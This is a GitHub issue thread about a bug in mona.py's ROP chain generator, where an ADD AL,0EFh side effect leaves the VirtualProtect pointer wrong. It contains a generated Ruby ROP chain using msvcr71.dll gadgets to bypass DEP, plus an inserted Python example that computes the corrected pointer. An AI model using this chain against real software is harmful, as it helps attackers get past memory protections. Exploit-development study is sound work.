corelan / mona

Corelan Repository for mona.py
BSD 3-Clause "New" or "Revised" License

Wrong Calculation of ROP chain #2

Closed gadin closed 8 years ago

gadin commented 9 years ago

Hi,

I used the latest version of Mona.py and hit a bug when calculating the return address to VirtualProtect: it forgot to calculate an add al,0EFh that will occur before the VirtualProtect call.

Thanks for the helpful tool though, Gadi

ROP Chain for VirtualProtect() [(XP/2003 Server and up)] :

* [ Ruby ] *

def create_rop_chain()

  # rop chain generated with mona.py - www.corelan.be
  rop_gadgets =
  [
    0x7c373fda,  # POP EBP # RETN [msvcr71.dll] 
    0x7c373fda,  # skip 4 bytes [msvcr71.dll]
    0x7c376747,  # POP EAX # RETN [msvcr71.dll] 
    0xfffffdff,  # Value to negate, will become 0x00000201
    0x7c352155,  # NEG EAX # RETN [msvcr71.dll] 
    0x7c341748,  # POP EBX # RETN [msvcr71.dll] 
    0xffffffff,  #  
    0x7c345255,  # INC EBX # FPATAN # RETN [msvcr71.dll] 
    0x7c363cff,  # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN [msvcr71.dll] 
    0x7c344f8e,  # POP EDX # RETN [msvcr71.dll] 
    0xffffffc0,  # Value to negate, will become 0x00000040
    0x7c351eb1,  # NEG EDX # RETN [msvcr71.dll] 
    0x7c34f7a0,  # POP ECX # RETN [msvcr71.dll] 
    0x7c38fd9f,  # &Writable location [msvcr71.dll]
    0x7c342953,  # POP EDI # RETN [msvcr71.dll] 
    0x7c34d202,  # RETN (ROP NOP) [msvcr71.dll]
    0x7c36374d,  # POP ESI # RETN [msvcr71.dll] 
    0x7c3415a2,  # JMP [EAX] [msvcr71.dll]
    0x7c34728e,  # POP EAX # RETN [msvcr71.dll] 
    0x7c37a140,  # ptr to &VirtualProtect() [IAT msvcr71.dll]   ---- BUG Error should be 7c37a151  ( will get eax to 0x7c37a140 when  add     al,0EFh; )
    0x7c378c81,  # PUSHAD # ADD AL,0EF # RETN [msvcr71.dll] 
    0x7c345c30,  # ptr to 'push esp # ret ' [msvcr71.dll]
  ].flatten.pack("V*")

  # the generated function returns the packed chain (the closing lines were cut off in the paste)
  return rop_gadgets

end

Mona version:

$Revision: 545 $ $Id: mona.py 545 2014-02-22 22:46:02Z corelanc0d3r $ """

VERSION = '2.0'
REV = filter(str.isdigit, '$Revision: 545 $')
IMM = '1.8'
DEBUGGERAPP = ''
arch = 32
win7mode = False
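Checking the reporter's arithmetic, as an added example that is not mona.py's own code and not part of the original thread: the gadget at 0x7c378c81 runs ADD AL,0EFh after PUSHAD, so only the low byte of EAX changes and the carry out of AL is dropped. The block below models that side effect, shows what the generated chain actually leaves in EAX, and derives the value that must be loaded beforehand so that EAX still points at the IAT entry afterwards. The function names are this example's own, and the width parameter generalises the same check to AX/EAX-sized adds, which the page does not discuss.

```python
# Added example (not mona.py's code): model of the "ADD AL, imm8" side effect
# described in the issue, plus the inverse calculation the reporter did by hand.

MASK32 = 0xFFFFFFFF


def add_subreg(eax: int, imm: int, bits: int = 8) -> int:
    """Apply ADD <low `bits` of EAX>, imm to a 32-bit EAX value.

    bits=8 models ADD AL, imm8; bits=16 models ADD AX, imm16; bits=32 models
    ADD EAX, imm32.  The carry out of the sub-register is discarded and the
    bits above it are left untouched, exactly as the hardware does.
    """
    if bits not in (8, 16, 32):
        raise ValueError("bits must be 8, 16 or 32")
    low_mask = (1 << bits) - 1
    eax &= MASK32
    new_low = ((eax & low_mask) + (imm & low_mask)) & low_mask
    return (eax & ~low_mask & MASK32) | new_low


def preload_for(target: int, imm: int, bits: int = 8) -> int:
    """Return the EAX value to load *before* the ADD so that EAX == target after it.

    Because the add wraps inside the sub-register, the subtraction must wrap
    the same way: (0x40 - 0xEF) & 0xFF == 0x51, which is why the corrected
    pointer in the issue is 0x7c37a151 rather than 0x7c37a140 - 0xEF.
    """
    if bits not in (8, 16, 32):
        raise ValueError("bits must be 8, 16 or 32")
    low_mask = (1 << bits) - 1
    target &= MASK32
    wanted_low = ((target & low_mask) - (imm & low_mask)) & low_mask
    return (target & ~low_mask & MASK32) | wanted_low


def audit_chain(preloaded: int, target: int, imm: int, bits: int = 8) -> dict:
    """Report what a chain that ignores the side effect really ends up with.

    preloaded: the value the chain pops into EAX before the gadget
    target:    the value EAX must hold when JMP [EAX] executes
    """
    actual = add_subreg(preloaded, imm, bits)
    return {
        "after_gadget": actual,
        "matches_target": actual == target,
        "corrected_preload": preload_for(target, imm, bits),
    }


if __name__ == "__main__":
    # Values taken from the chain in the issue: the IAT slot mona loaded into
    # EAX, and the immediate of the ADD AL in the PUSHAD gadget.
    iat_ptr = 0x7C37A140
    imm8 = 0xEF
    report = audit_chain(iat_ptr, iat_ptr, imm8)
    print(f"EAX after ADD AL,0EFh: {report['after_gadget']:#010x} "
          f"(points at IAT entry: {report['matches_target']})")
    print(f"value to pop into EAX instead: {report['corrected_preload']:#010x}")
```

Running the block reproduces the reporter's finding: the generated chain leaves EAX at 0x7c37a12f, one byte short of the IAT slot, and the preload that survives the gadget is 0x7c37a151. The wrap-around matters for auditing any generated chain by hand: when the target's low byte is smaller than the immediate (say a pointer ending in 0x00), the correct preload is a larger low byte, not a borrow out of the next byte, because the carry never leaves AL.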

corelanc0d3r commented 9 years ago

correct, this is a known issue... although trivial to spot & fix manually, I'll add this to my to-do list

corelanc0d3r commented 8 years ago

decided not to fix this issue (as other corner cases can exist) - the way the code is written in mona.py would make it quite complex to fix... the good news is that it's very easy to fix manually. mona.py is not perfect, but it will put you on the right track :)